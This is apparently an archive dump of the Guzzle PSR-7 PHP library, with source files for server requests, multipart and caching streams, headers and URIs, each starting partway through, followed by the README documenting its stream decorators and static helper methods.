$value['error'], $value['name'], $value['type'] ); } /** * Normalize an array of file specifications. * * Loops through all nested files and returns a normalized array of * UploadedFileInterface instances. * * @return UploadedFileInterface[] */ private static function normalizeNestedFileSpec(array $files = []): array { $normalizedFiles = []; foreach (array_keys($files['tmp_name']) as $key) { $spec = [ 'tmp_name' => $files['tmp_name'][$key], 'size' => $files['size'][$key] ?? null, 'error' => $files['error'][$key] ?? null, 'name' => $files['name'][$key] ?? null, 'type' => $files['type'][$key] ?? null, ]; $normalizedFiles[$key] = self::createUploadedFileFromSpec($spec); } return $normalizedFiles; } /** * Return a ServerRequest populated with superglobals: * $_GET * $_POST * $_COOKIE * $_FILES * $_SERVER */ public static function fromGlobals(): ServerRequestInterface { $method = $_SERVER['REQUEST_METHOD'] ?? 'GET'; $headers = getallheaders(); $uri = self::getUriFromGlobals(); $body = new CachingStream(new LazyOpenStream('php://input', 'r+')); $protocol = isset($_SERVER['SERVER_PROTOCOL']) ? str_replace('HTTP/', '', $_SERVER['SERVER_PROTOCOL']) : '1.1'; $serverRequest = new ServerRequest($method, $uri, $headers, $body, $protocol, $_SERVER); return $serverRequest ->withCookieParams($_COOKIE) ->withQueryParams($_GET) ->withParsedBody($_POST) ->withUploadedFiles(self::normalizeFiles($_FILES)); } private static function extractHostAndPortFromAuthority(string $authority): array { $uri = 'http://'.$authority; $parts = parse_url($uri); if (false === $parts) { return [null, null]; } $host = $parts['host'] ?? null; $port = $parts['port'] ?? null; return [$host, $port]; } /** * Get a Uri populated with values from $_SERVER. */ public static function getUriFromGlobals(): UriInterface { $uri = new Uri(''); $uri = $uri->withScheme(!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' ? 'https' : 'http'); $hasPort = false; if (isset($_SERVER['HTTP_HOST'])) { [$host, $port] = self::extractHostAndPortFromAuthority($_SERVER['HTTP_HOST']); if ($host !== null) { $uri = $uri->withHost($host); } if ($port !== null) { $hasPort = true; $uri = $uri->withPort($port); } } elseif (isset($_SERVER['SERVER_NAME'])) { $uri = $uri->withHost($_SERVER['SERVER_NAME']); } elseif (isset($_SERVER['SERVER_ADDR'])) { $uri = $uri->withHost($_SERVER['SERVER_ADDR']); } if (!$hasPort && isset($_SERVER['SERVER_PORT'])) { $uri = $uri->withPort($_SERVER['SERVER_PORT']); } $hasQuery = false; if (isset($_SERVER['REQUEST_URI'])) { $requestUriParts = explode('?', $_SERVER['REQUEST_URI'], 2); $uri = $uri->withPath($requestUriParts[0]); if (isset($requestUriParts[1])) { $hasQuery = true; $uri = $uri->withQuery($requestUriParts[1]); } } if (!$hasQuery && isset($_SERVER['QUERY_STRING'])) { $uri = $uri->withQuery($_SERVER['QUERY_STRING']); } return $uri; } public function getServerParams(): array { return $this->serverParams; } public function getUploadedFiles(): array { return $this->uploadedFiles; } public function withUploadedFiles(array $uploadedFiles): ServerRequestInterface { $new = clone $this; $new->uploadedFiles = $uploadedFiles; return $new; } public function getCookieParams(): array { return $this->cookieParams; } public function withCookieParams(array $cookies): ServerRequestInterface { $new = clone $this; $new->cookieParams = $cookies; return $new; } public function getQueryParams(): array { return $this->queryParams; } public function withQueryParams(array $query): ServerRequestInterface { $new = clone $this; $new->queryParams = $query; return $new; } /** * @return array|object|null */ public function getParsedBody() { return $this->parsedBody; } public function withParsedBody($data): ServerRequestInterface { $new = clone $this; $new->parsedBody = $data; return $new; } public function getAttributes(): array { return $this->attributes; } /** * @return mixed */ public function getAttribute($attribute, $default = null) { if (false === array_key_exists($attribute, $this->attributes)) { return $default; } return $this->attributes[$attribute]; } public function withAttribute($attribute, $value): ServerRequestInterface { $new = clone $this; $new->attributes[$attribute] = $value; return $new; } public function withoutAttribute($attribute): ServerRequestInterface { if (false === array_key_exists($attribute, $this->attributes)) { return $this; } $new = clone $this; unset($new->attributes[$attribute]); return $new; } } google-api/vendor/guzzlehttp/psr7/src/MultipartStream.php000064400000012070147600400120017626 0ustar00boundary = $boundary ?: bin2hex(random_bytes(20)); $this->stream = $this->createStream($elements); } public function getBoundary(): string { return $this->boundary; } public function isWritable(): bool { return false; } /** * Get the headers needed before transferring the content of a POST file * * @param string[] $headers */ private function getHeaders(array $headers): string { $str = ''; foreach ($headers as $key => $value) { $str .= "{$key}: {$value}\r\n"; } return "--{$this->boundary}\r\n".trim($str)."\r\n\r\n"; } /** * Create the aggregate stream that will be used to upload the POST data */ protected function createStream(array $elements = []): StreamInterface { $stream = new AppendStream(); foreach ($elements as $element) { if (!is_array($element)) { throw new \UnexpectedValueException('An array is expected'); } $this->addElement($stream, $element); } // Add the trailing boundary with CRLF $stream->addStream(Utils::streamFor("--{$this->boundary}--\r\n")); return $stream; } private function addElement(AppendStream $stream, array $element): void { foreach (['contents', 'name'] as $key) { if (!array_key_exists($key, $element)) { throw new \InvalidArgumentException("A '{$key}' key is required"); } } $element['contents'] = Utils::streamFor($element['contents']); if (empty($element['filename'])) { $uri = $element['contents']->getMetadata('uri'); if ($uri && \is_string($uri) && \substr($uri, 0, 6) !== 'php://' && \substr($uri, 0, 7) !== 'data://') { $element['filename'] = $uri; } } [$body, $headers] = $this->createElement( $element['name'], $element['contents'], $element['filename'] ?? null, $element['headers'] ?? [] ); $stream->addStream(Utils::streamFor($this->getHeaders($headers))); $stream->addStream($body); $stream->addStream(Utils::streamFor("\r\n")); } /** * @param string[] $headers * * @return array{0: StreamInterface, 1: string[]} */ private function createElement(string $name, StreamInterface $stream, ?string $filename, array $headers): array { // Set a default content-disposition header if one was no provided $disposition = self::getHeader($headers, 'content-disposition'); if (!$disposition) { $headers['Content-Disposition'] = ($filename === '0' || $filename) ? sprintf( 'form-data; name="%s"; filename="%s"', $name, basename($filename) ) : "form-data; name=\"{$name}\""; } // Set a default content-length header if one was no provided $length = self::getHeader($headers, 'content-length'); if (!$length) { if ($length = $stream->getSize()) { $headers['Content-Length'] = (string) $length; } } // Set a default Content-Type if one was not supplied $type = self::getHeader($headers, 'content-type'); if (!$type && ($filename === '0' || $filename)) { $headers['Content-Type'] = MimeType::fromFilename($filename) ?? 'application/octet-stream'; } return [$stream, $headers]; } /** * @param string[] $headers */ private static function getHeader(array $headers, string $key): ?string { $lowercaseHeader = strtolower($key); foreach ($headers as $k => $v) { if (strtolower((string) $k) === $lowercaseHeader) { return $v; } } return null; } } google-api/vendor/guzzlehttp/psr7/src/CachingStream.php000064400000010760147600400120017205 0ustar00remoteStream = $stream; $this->stream = $target ?: new Stream(Utils::tryFopen('php://temp', 'r+')); } public function getSize(): ?int { $remoteSize = $this->remoteStream->getSize(); if (null === $remoteSize) { return null; } return max($this->stream->getSize(), $remoteSize); } public function rewind(): void { $this->seek(0); } public function seek($offset, $whence = SEEK_SET): void { if ($whence === SEEK_SET) { $byte = $offset; } elseif ($whence === SEEK_CUR) { $byte = $offset + $this->tell(); } elseif ($whence === SEEK_END) { $size = $this->remoteStream->getSize(); if ($size === null) { $size = $this->cacheEntireStream(); } $byte = $size + $offset; } else { throw new \InvalidArgumentException('Invalid whence'); } $diff = $byte - $this->stream->getSize(); if ($diff > 0) { // Read the remoteStream until we have read in at least the amount // of bytes requested, or we reach the end of the file. while ($diff > 0 && !$this->remoteStream->eof()) { $this->read($diff); $diff = $byte - $this->stream->getSize(); } } else { // We can just do a normal seek since we've already seen this byte. $this->stream->seek($byte); } } public function read($length): string { // Perform a regular read on any previously read data from the buffer $data = $this->stream->read($length); $remaining = $length - strlen($data); // More data was requested so read from the remote stream if ($remaining) { // If data was written to the buffer in a position that would have // been filled from the remote stream, then we must skip bytes on // the remote stream to emulate overwriting bytes from that // position. This mimics the behavior of other PHP stream wrappers. $remoteData = $this->remoteStream->read( $remaining + $this->skipReadBytes ); if ($this->skipReadBytes) { $len = strlen($remoteData); $remoteData = substr($remoteData, $this->skipReadBytes); $this->skipReadBytes = max(0, $this->skipReadBytes - $len); } $data .= $remoteData; $this->stream->write($remoteData); } return $data; } public function write($string): int { // When appending to the end of the currently read stream, you'll want // to skip bytes from being read from the remote stream to emulate // other stream wrappers. Basically replacing bytes of data of a fixed // length. $overflow = (strlen($string) + $this->tell()) - $this->remoteStream->tell(); if ($overflow > 0) { $this->skipReadBytes += $overflow; } return $this->stream->write($string); } public function eof(): bool { return $this->stream->eof() && $this->remoteStream->eof(); } /** * Close both the remote stream and buffer stream */ public function close(): void { $this->remoteStream->close(); $this->stream->close(); } private function cacheEntireStream(): int { $target = new FnStream(['write' => 'strlen']); Utils::copyToStream($this, $target); return $this->tell(); } } google-api/vendor/guzzlehttp/psr7/src/HttpFactory.php000064400000006000147600400120016734 0ustar00getSize(); } return new UploadedFile($stream, $size, $error, $clientFilename, $clientMediaType); } public function createStream(string $content = ''): StreamInterface { return Utils::streamFor($content); } public function createStreamFromFile(string $file, string $mode = 'r'): StreamInterface { try { $resource = Utils::tryFopen($file, $mode); } catch (\RuntimeException $e) { if ('' === $mode || false === \in_array($mode[0], ['r', 'w', 'a', 'x', 'c'], true)) { throw new \InvalidArgumentException(sprintf('Invalid file opening mode "%s"', $mode), 0, $e); } throw $e; } return Utils::streamFor($resource); } public function createStreamFromResource($resource): StreamInterface { return Utils::streamFor($resource); } public function createServerRequest(string $method, $uri, array $serverParams = []): ServerRequestInterface { if (empty($method)) { if (!empty($serverParams['REQUEST_METHOD'])) { $method = $serverParams['REQUEST_METHOD']; } else { throw new \InvalidArgumentException('Cannot determine HTTP method'); } } return new ServerRequest($method, $uri, [], null, '1.1', $serverParams); } public function createResponse(int $code = 200, string $reasonPhrase = ''): ResponseInterface { return new Response($code, [], null, '1.1', $reasonPhrase); } public function createRequest(string $method, $uri): RequestInterface { return new Request($method, $uri); } public function createUri(string $uri = ''): UriInterface { return new Uri($uri); } } google-api/vendor/guzzlehttp/psr7/src/Header.php000064400000007545147600400120015674 0ustar00]+>|[^=]+/', $kvp, $matches)) { $m = $matches[0]; if (isset($m[1])) { $part[trim($m[0], $trimmed)] = trim($m[1], $trimmed); } else { $part[] = trim($m[0], $trimmed); } } } if ($part) { $params[] = $part; } } } return $params; } /** * Converts an array of header values that may contain comma separated * headers into an array of headers with no comma separated values. * * @param string|array $header Header to normalize. * * @deprecated Use self::splitList() instead. */ public static function normalize($header): array { $result = []; foreach ((array) $header as $value) { foreach (self::splitList($value) as $parsed) { $result[] = $parsed; } } return $result; } /** * Splits a HTTP header defined to contain a comma-separated list into * each individual value. Empty values will be removed. * * Example headers include 'accept', 'cache-control' and 'if-none-match'. * * This method must not be used to parse headers that are not defined as * a list, such as 'user-agent' or 'set-cookie'. * * @param string|string[] $values Header value as returned by MessageInterface::getHeader() * * @return string[] */ public static function splitList($values): array { if (!\is_array($values)) { $values = [$values]; } $result = []; foreach ($values as $value) { if (!\is_string($value)) { throw new \TypeError('$header must either be a string or an array containing strings.'); } $v = ''; $isQuoted = false; $isEscaped = false; for ($i = 0, $max = \strlen($value); $i < $max; ++$i) { if ($isEscaped) { $v .= $value[$i]; $isEscaped = false; continue; } if (!$isQuoted && $value[$i] === ',') { $v = \trim($v); if ($v !== '') { $result[] = $v; } $v = ''; continue; } if ($isQuoted && $value[$i] === '\\') { $isEscaped = true; $v .= $value[$i]; continue; } if ($value[$i] === '"') { $isQuoted = !$isQuoted; $v .= $value[$i]; continue; } $v .= $value[$i]; } $v = \trim($v); if ($v !== '') { $result[] = $v; } } return $result; } } google-api/vendor/guzzlehttp/psr7/src/Request.php000064400000007504147600400120016127 0ustar00assertMethod($method); if (!($uri instanceof UriInterface)) { $uri = new Uri($uri); } $this->method = strtoupper($method); $this->uri = $uri; $this->setHeaders($headers); $this->protocol = $version; if (!isset($this->headerNames['host'])) { $this->updateHostFromUri(); } if ($body !== '' && $body !== null) { $this->stream = Utils::streamFor($body); } } public function getRequestTarget(): string { if ($this->requestTarget !== null) { return $this->requestTarget; } $target = $this->uri->getPath(); if ($target === '') { $target = '/'; } if ($this->uri->getQuery() != '') { $target .= '?'.$this->uri->getQuery(); } return $target; } public function withRequestTarget($requestTarget): RequestInterface { if (preg_match('#\s#', $requestTarget)) { throw new InvalidArgumentException( 'Invalid request target provided; cannot contain whitespace' ); } $new = clone $this; $new->requestTarget = $requestTarget; return $new; } public function getMethod(): string { return $this->method; } public function withMethod($method): RequestInterface { $this->assertMethod($method); $new = clone $this; $new->method = strtoupper($method); return $new; } public function getUri(): UriInterface { return $this->uri; } public function withUri(UriInterface $uri, $preserveHost = false): RequestInterface { if ($uri === $this->uri) { return $this; } $new = clone $this; $new->uri = $uri; if (!$preserveHost || !isset($this->headerNames['host'])) { $new->updateHostFromUri(); } return $new; } private function updateHostFromUri(): void { $host = $this->uri->getHost(); if ($host == '') { return; } if (($port = $this->uri->getPort()) !== null) { $host .= ':'.$port; } if (isset($this->headerNames['host'])) { $header = $this->headerNames['host']; } else { $header = 'Host'; $this->headerNames['host'] = 'Host'; } // Ensure Host is the first header. // See: https://datatracker.ietf.org/doc/html/rfc7230#section-5.4 $this->headers = [$header => [$host]] + $this->headers; } /** * @param mixed $method */ private function assertMethod($method): void { if (!is_string($method) || $method === '') { throw new InvalidArgumentException('Method must be a non-empty string.'); } } } google-api/vendor/guzzlehttp/psr7/src/UriComparator.php000064400000002176147600400120017266 0ustar00getHost(), $modified->getHost()) !== 0) { return true; } if ($original->getScheme() !== $modified->getScheme()) { return true; } if (self::computePort($original) !== self::computePort($modified)) { return true; } return false; } private static function computePort(UriInterface $uri): int { $port = $uri->getPort(); if (null !== $port) { return $port; } return 'https' === $uri->getScheme() ? 443 : 80; } private function __construct() { // cannot be instantiated } } google-api/vendor/guzzlehttp/psr7/README.md000064400000071152147600400120014456 0ustar00# PSR-7 Message Implementation This repository contains a full [PSR-7](https://www.php-fig.org/psr/psr-7/) message implementation, several stream decorators, and some helpful functionality like query string parsing. ![CI](https://github.com/guzzle/psr7/workflows/CI/badge.svg) ![Static analysis](https://github.com/guzzle/psr7/workflows/Static%20analysis/badge.svg) ## Features This package comes with a number of stream implementations and stream decorators. ## Installation ```shell composer require guzzlehttp/psr7 ``` ## Version Guidance | Version | Status | PHP Version | |---------|---------------------|--------------| | 1.x | Security fixes only | >=5.4,<8.1 | | 2.x | Latest | >=7.2.5,<8.4 | ## AppendStream `GuzzleHttp\Psr7\AppendStream` Reads from multiple streams, one after the other. ```php use GuzzleHttp\Psr7; $a = Psr7\Utils::streamFor('abc, '); $b = Psr7\Utils::streamFor('123.'); $composed = new Psr7\AppendStream([$a, $b]); $composed->addStream(Psr7\Utils::streamFor(' Above all listen to me')); echo $composed; // abc, 123. Above all listen to me. ``` ## BufferStream `GuzzleHttp\Psr7\BufferStream` Provides a buffer stream that can be written to fill a buffer, and read from to remove bytes from the buffer. This stream returns a "hwm" metadata value that tells upstream consumers what the configured high water mark of the stream is, or the maximum preferred size of the buffer. ```php use GuzzleHttp\Psr7; // When more than 1024 bytes are in the buffer, it will begin returning // false to writes. This is an indication that writers should slow down. $buffer = new Psr7\BufferStream(1024); ``` ## CachingStream The CachingStream is used to allow seeking over previously read bytes on non-seekable streams. This can be useful when transferring a non-seekable entity body fails due to needing to rewind the stream (for example, resulting from a redirect). Data that is read from the remote stream will be buffered in a PHP temp stream so that previously read bytes are cached first in memory, then on disk. ```php use GuzzleHttp\Psr7; $original = Psr7\Utils::streamFor(fopen('http://www.google.com', 'r')); $stream = new Psr7\CachingStream($original); $stream->read(1024); echo $stream->tell(); // 1024 $stream->seek(0); echo $stream->tell(); // 0 ``` ## DroppingStream `GuzzleHttp\Psr7\DroppingStream` Stream decorator that begins dropping data once the size of the underlying stream becomes too full. ```php use GuzzleHttp\Psr7; // Create an empty stream $stream = Psr7\Utils::streamFor(); // Start dropping data when the stream has more than 10 bytes $dropping = new Psr7\DroppingStream($stream, 10); $dropping->write('01234567890123456789'); echo $stream; // 0123456789 ``` ## FnStream `GuzzleHttp\Psr7\FnStream` Compose stream implementations based on a hash of functions. Allows for easy testing and extension of a provided stream without needing to create a concrete class for a simple extension point. ```php use GuzzleHttp\Psr7; $stream = Psr7\Utils::streamFor('hi'); $fnStream = Psr7\FnStream::decorate($stream, [ 'rewind' => function () use ($stream) { echo 'About to rewind - '; $stream->rewind(); echo 'rewound!'; } ]); $fnStream->rewind(); // Outputs: About to rewind - rewound! ``` ## InflateStream `GuzzleHttp\Psr7\InflateStream` Uses PHP's zlib.inflate filter to inflate zlib (HTTP deflate, RFC1950) or gzipped (RFC1952) content. This stream decorator converts the provided stream to a PHP stream resource, then appends the zlib.inflate filter. The stream is then converted back to a Guzzle stream resource to be used as a Guzzle stream. ## LazyOpenStream `GuzzleHttp\Psr7\LazyOpenStream` Lazily reads or writes to a file that is opened only after an IO operation take place on the stream. ```php use GuzzleHttp\Psr7; $stream = new Psr7\LazyOpenStream('/path/to/file', 'r'); // The file has not yet been opened... echo $stream->read(10); // The file is opened and read from only when needed. ``` ## LimitStream `GuzzleHttp\Psr7\LimitStream` LimitStream can be used to read a subset or slice of an existing stream object. This can be useful for breaking a large file into smaller pieces to be sent in chunks (e.g. Amazon S3's multipart upload API). ```php use GuzzleHttp\Psr7; $original = Psr7\Utils::streamFor(fopen('/tmp/test.txt', 'r+')); echo $original->getSize(); // >>> 1048576 // Limit the size of the body to 1024 bytes and start reading from byte 2048 $stream = new Psr7\LimitStream($original, 1024, 2048); echo $stream->getSize(); // >>> 1024 echo $stream->tell(); // >>> 0 ``` ## MultipartStream `GuzzleHttp\Psr7\MultipartStream` Stream that when read returns bytes for a streaming multipart or multipart/form-data stream. ## NoSeekStream `GuzzleHttp\Psr7\NoSeekStream` NoSeekStream wraps a stream and does not allow seeking. ```php use GuzzleHttp\Psr7; $original = Psr7\Utils::streamFor('foo'); $noSeek = new Psr7\NoSeekStream($original); echo $noSeek->read(3); // foo var_export($noSeek->isSeekable()); // false $noSeek->seek(0); var_export($noSeek->read(3)); // NULL ``` ## PumpStream `GuzzleHttp\Psr7\PumpStream` Provides a read only stream that pumps data from a PHP callable. When invoking the provided callable, the PumpStream will pass the amount of data requested to read to the callable. The callable can choose to ignore this value and return fewer or more bytes than requested. Any extra data returned by the provided callable is buffered internally until drained using the read() function of the PumpStream. The provided callable MUST return false when there is no more data to read. ## Implementing stream decorators Creating a stream decorator is very easy thanks to the `GuzzleHttp\Psr7\StreamDecoratorTrait`. This trait provides methods that implement `Psr\Http\Message\StreamInterface` by proxying to an underlying stream. Just `use` the `StreamDecoratorTrait` and implement your custom methods. For example, let's say we wanted to call a specific function each time the last byte is read from a stream. This could be implemented by overriding the `read()` method. ```php use Psr\Http\Message\StreamInterface; use GuzzleHttp\Psr7\StreamDecoratorTrait; class EofCallbackStream implements StreamInterface { use StreamDecoratorTrait; private $callback; private $stream; public function __construct(StreamInterface $stream, callable $cb) { $this->stream = $stream; $this->callback = $cb; } public function read($length) { $result = $this->stream->read($length); // Invoke the callback when EOF is hit. if ($this->eof()) { ($this->callback)(); } return $result; } } ``` This decorator could be added to any existing stream and used like so: ```php use GuzzleHttp\Psr7; $original = Psr7\Utils::streamFor('foo'); $eofStream = new EofCallbackStream($original, function () { echo 'EOF!'; }); $eofStream->read(2); $eofStream->read(1); // echoes "EOF!" $eofStream->seek(0); $eofStream->read(3); // echoes "EOF!" ``` ## PHP StreamWrapper You can use the `GuzzleHttp\Psr7\StreamWrapper` class if you need to use a PSR-7 stream as a PHP stream resource. Use the `GuzzleHttp\Psr7\StreamWrapper::getResource()` method to create a PHP stream from a PSR-7 stream. ```php use GuzzleHttp\Psr7\StreamWrapper; $stream = GuzzleHttp\Psr7\Utils::streamFor('hello!'); $resource = StreamWrapper::getResource($stream); echo fread($resource, 6); // outputs hello! ``` # Static API There are various static methods available under the `GuzzleHttp\Psr7` namespace. ## `GuzzleHttp\Psr7\Message::toString` `public static function toString(MessageInterface $message): string` Returns the string representation of an HTTP message. ```php $request = new GuzzleHttp\Psr7\Request('GET', 'http://example.com'); echo GuzzleHttp\Psr7\Message::toString($request); ``` ## `GuzzleHttp\Psr7\Message::bodySummary` `public static function bodySummary(MessageInterface $message, int $truncateAt = 120): string|null` Get a short summary of the message body. Will return `null` if the response is not printable. ## `GuzzleHttp\Psr7\Message::rewindBody` `public static function rewindBody(MessageInterface $message): void` Attempts to rewind a message body and throws an exception on failure. The body of the message will only be rewound if a call to `tell()` returns a value other than `0`. ## `GuzzleHttp\Psr7\Message::parseMessage` `public static function parseMessage(string $message): array` Parses an HTTP message into an associative array. The array contains the "start-line" key containing the start line of the message, "headers" key containing an associative array of header array values, and a "body" key containing the body of the message. ## `GuzzleHttp\Psr7\Message::parseRequestUri` `public static function parseRequestUri(string $path, array $headers): string` Constructs a URI for an HTTP request message. ## `GuzzleHttp\Psr7\Message::parseRequest` `public static function parseRequest(string $message): Request` Parses a request message string into a request object. ## `GuzzleHttp\Psr7\Message::parseResponse` `public static function parseResponse(string $message): Response` Parses a response message string into a response object. ## `GuzzleHttp\Psr7\Header::parse` `public static function parse(string|array $header): array` Parse an array of header values containing ";" separated data into an array of associative arrays representing the header key value pair data of the header. When a parameter does not contain a value, but just contains a key, this function will inject a key with a '' string value. ## `GuzzleHttp\Psr7\Header::splitList` `public static function splitList(string|string[] $header): string[]` Splits a HTTP header defined to contain a comma-separated list into each individual value: ``` $knownEtags = Header::splitList($request->getHeader('if-none-match')); ``` Example headers include `accept`, `cache-control` and `if-none-match`. ## `GuzzleHttp\Psr7\Header::normalize` (deprecated) `public static function normalize(string|array $header): array` `Header::normalize()` is deprecated in favor of [`Header::splitList()`](README.md#guzzlehttppsr7headersplitlist) which performs the same operation with a cleaned up API and improved documentation. Converts an array of header values that may contain comma separated headers into an array of headers with no comma separated values. ## `GuzzleHttp\Psr7\Query::parse` `public static function parse(string $str, int|bool $urlEncoding = true): array` Parse a query string into an associative array. If multiple values are found for the same key, the value of that key value pair will become an array. This function does not parse nested PHP style arrays into an associative array (e.g., `foo[a]=1&foo[b]=2` will be parsed into `['foo[a]' => '1', 'foo[b]' => '2'])`. ## `GuzzleHttp\Psr7\Query::build` `public static function build(array $params, int|false $encoding = PHP_QUERY_RFC3986): string` Build a query string from an array of key value pairs. This function can use the return value of `parse()` to build a query string. This function does not modify the provided keys when an array is encountered (like `http_build_query()` would). ## `GuzzleHttp\Psr7\Utils::caselessRemove` `public static function caselessRemove(iterable $keys, $keys, array $data): array` Remove the items given by the keys, case insensitively from the data. ## `GuzzleHttp\Psr7\Utils::copyToStream` `public static function copyToStream(StreamInterface $source, StreamInterface $dest, int $maxLen = -1): void` Copy the contents of a stream into another stream until the given number of bytes have been read. ## `GuzzleHttp\Psr7\Utils::copyToString` `public static function copyToString(StreamInterface $stream, int $maxLen = -1): string` Copy the contents of a stream into a string until the given number of bytes have been read. ## `GuzzleHttp\Psr7\Utils::hash` `public static function hash(StreamInterface $stream, string $algo, bool $rawOutput = false): string` Calculate a hash of a stream. This method reads the entire stream to calculate a rolling hash, based on PHP's `hash_init` functions. ## `GuzzleHttp\Psr7\Utils::modifyRequest` `public static function modifyRequest(RequestInterface $request, array $changes): RequestInterface` Clone and modify a request with the given changes. This method is useful for reducing the number of clones needed to mutate a message. - method: (string) Changes the HTTP method. - set_headers: (array) Sets the given headers. - remove_headers: (array) Remove the given headers. - body: (mixed) Sets the given body. - uri: (UriInterface) Set the URI. - query: (string) Set the query string value of the URI. - version: (string) Set the protocol version. ## `GuzzleHttp\Psr7\Utils::readLine` `public static function readLine(StreamInterface $stream, int $maxLength = null): string` Read a line from the stream up to the maximum allowed buffer length. ## `GuzzleHttp\Psr7\Utils::streamFor` `public static function streamFor(resource|string|null|int|float|bool|StreamInterface|callable|\Iterator $resource = '', array $options = []): StreamInterface` Create a new stream based on the input type. Options is an associative array that can contain the following keys: - metadata: Array of custom metadata. - size: Size of the stream. This method accepts the following `$resource` types: - `Psr\Http\Message\StreamInterface`: Returns the value as-is. - `string`: Creates a stream object that uses the given string as the contents. - `resource`: Creates a stream object that wraps the given PHP stream resource. - `Iterator`: If the provided value implements `Iterator`, then a read-only stream object will be created that wraps the given iterable. Each time the stream is read from, data from the iterator will fill a buffer and will be continuously called until the buffer is equal to the requested read size. Subsequent read calls will first read from the buffer and then call `next` on the underlying iterator until it is exhausted. - `object` with `__toString()`: If the object has the `__toString()` method, the object will be cast to a string and then a stream will be returned that uses the string value. - `NULL`: When `null` is passed, an empty stream object is returned. - `callable` When a callable is passed, a read-only stream object will be created that invokes the given callable. The callable is invoked with the number of suggested bytes to read. The callable can return any number of bytes, but MUST return `false` when there is no more data to return. The stream object that wraps the callable will invoke the callable until the number of requested bytes are available. Any additional bytes will be buffered and used in subsequent reads. ```php $stream = GuzzleHttp\Psr7\Utils::streamFor('foo'); $stream = GuzzleHttp\Psr7\Utils::streamFor(fopen('/path/to/file', 'r')); $generator = function ($bytes) { for ($i = 0; $i < $bytes; $i++) { yield ' '; } } $stream = GuzzleHttp\Psr7\Utils::streamFor($generator(100)); ``` ## `GuzzleHttp\Psr7\Utils::tryFopen` `public static function tryFopen(string $filename, string $mode): resource` Safely opens a PHP stream resource using a filename. When fopen fails, PHP normally raises a warning. This function adds an error handler that checks for errors and throws an exception instead. ## `GuzzleHttp\Psr7\Utils::tryGetContents` `public static function tryGetContents(resource $stream): string` Safely gets the contents of a given stream. When stream_get_contents fails, PHP normally raises a warning. This function adds an error handler that checks for errors and throws an exception instead. ## `GuzzleHttp\Psr7\Utils::uriFor` `public static function uriFor(string|UriInterface $uri): UriInterface` Returns a UriInterface for the given value. This function accepts a string or UriInterface and returns a UriInterface for the given value. If the value is already a UriInterface, it is returned as-is. ## `GuzzleHttp\Psr7\MimeType::fromFilename` `public static function fromFilename(string $filename): string|null` Determines the mimetype of a file by looking at its extension. ## `GuzzleHttp\Psr7\MimeType::fromExtension` `public static function fromExtension(string $extension): string|null` Maps a file extensions to a mimetype. ## Upgrading from Function API The static API was first introduced in 1.7.0, in order to mitigate problems with functions conflicting between global and local copies of the package. The function API was removed in 2.0.0. A migration table has been provided here for your convenience: | Original Function | Replacement Method | |----------------|----------------| | `str` | `Message::toString` | | `uri_for` | `Utils::uriFor` | | `stream_for` | `Utils::streamFor` | | `parse_header` | `Header::parse` | | `normalize_header` | `Header::normalize` | | `modify_request` | `Utils::modifyRequest` | | `rewind_body` | `Message::rewindBody` | | `try_fopen` | `Utils::tryFopen` | | `copy_to_string` | `Utils::copyToString` | | `copy_to_stream` | `Utils::copyToStream` | | `hash` | `Utils::hash` | | `readline` | `Utils::readLine` | | `parse_request` | `Message::parseRequest` | | `parse_response` | `Message::parseResponse` | | `parse_query` | `Query::parse` | | `build_query` | `Query::build` | | `mimetype_from_filename` | `MimeType::fromFilename` | | `mimetype_from_extension` | `MimeType::fromExtension` | | `_parse_message` | `Message::parseMessage` | | `_parse_request_uri` | `Message::parseRequestUri` | | `get_message_body_summary` | `Message::bodySummary` | | `_caseless_remove` | `Utils::caselessRemove` | # Additional URI Methods Aside from the standard `Psr\Http\Message\UriInterface` implementation in form of the `GuzzleHttp\Psr7\Uri` class, this library also provides additional functionality when working with URIs as static methods. ## URI Types An instance of `Psr\Http\Message\UriInterface` can either be an absolute URI or a relative reference. An absolute URI has a scheme. A relative reference is used to express a URI relative to another URI, the base URI. Relative references can be divided into several forms according to [RFC 3986 Section 4.2](https://datatracker.ietf.org/doc/html/rfc3986#section-4.2): - network-path references, e.g. `//example.com/path` - absolute-path references, e.g. `/path` - relative-path references, e.g. `subpath` The following methods can be used to identify the type of the URI. ### `GuzzleHttp\Psr7\Uri::isAbsolute` `public static function isAbsolute(UriInterface $uri): bool` Whether the URI is absolute, i.e. it has a scheme. ### `GuzzleHttp\Psr7\Uri::isNetworkPathReference` `public static function isNetworkPathReference(UriInterface $uri): bool` Whether the URI is a network-path reference. A relative reference that begins with two slash characters is termed an network-path reference. ### `GuzzleHttp\Psr7\Uri::isAbsolutePathReference` `public static function isAbsolutePathReference(UriInterface $uri): bool` Whether the URI is a absolute-path reference. A relative reference that begins with a single slash character is termed an absolute-path reference. ### `GuzzleHttp\Psr7\Uri::isRelativePathReference` `public static function isRelativePathReference(UriInterface $uri): bool` Whether the URI is a relative-path reference. A relative reference that does not begin with a slash character is termed a relative-path reference. ### `GuzzleHttp\Psr7\Uri::isSameDocumentReference` `public static function isSameDocumentReference(UriInterface $uri, UriInterface $base = null): bool` Whether the URI is a same-document reference. A same-document reference refers to a URI that is, aside from its fragment component, identical to the base URI. When no base URI is given, only an empty URI reference (apart from its fragment) is considered a same-document reference. ## URI Components Additional methods to work with URI components. ### `GuzzleHttp\Psr7\Uri::isDefaultPort` `public static function isDefaultPort(UriInterface $uri): bool` Whether the URI has the default port of the current scheme. `Psr\Http\Message\UriInterface::getPort` may return null or the standard port. This method can be used independently of the implementation. ### `GuzzleHttp\Psr7\Uri::composeComponents` `public static function composeComponents($scheme, $authority, $path, $query, $fragment): string` Composes a URI reference string from its various components according to [RFC 3986 Section 5.3](https://datatracker.ietf.org/doc/html/rfc3986#section-5.3). Usually this method does not need to be called manually but instead is used indirectly via `Psr\Http\Message\UriInterface::__toString`. ### `GuzzleHttp\Psr7\Uri::fromParts` `public static function fromParts(array $parts): UriInterface` Creates a URI from a hash of [`parse_url`](https://www.php.net/manual/en/function.parse-url.php) components. ### `GuzzleHttp\Psr7\Uri::withQueryValue` `public static function withQueryValue(UriInterface $uri, $key, $value): UriInterface` Creates a new URI with a specific query string value. Any existing query string values that exactly match the provided key are removed and replaced with the given key value pair. A value of null will set the query string key without a value, e.g. "key" instead of "key=value". ### `GuzzleHttp\Psr7\Uri::withQueryValues` `public static function withQueryValues(UriInterface $uri, array $keyValueArray): UriInterface` Creates a new URI with multiple query string values. It has the same behavior as `withQueryValue()` but for an associative array of key => value. ### `GuzzleHttp\Psr7\Uri::withoutQueryValue` `public static function withoutQueryValue(UriInterface $uri, 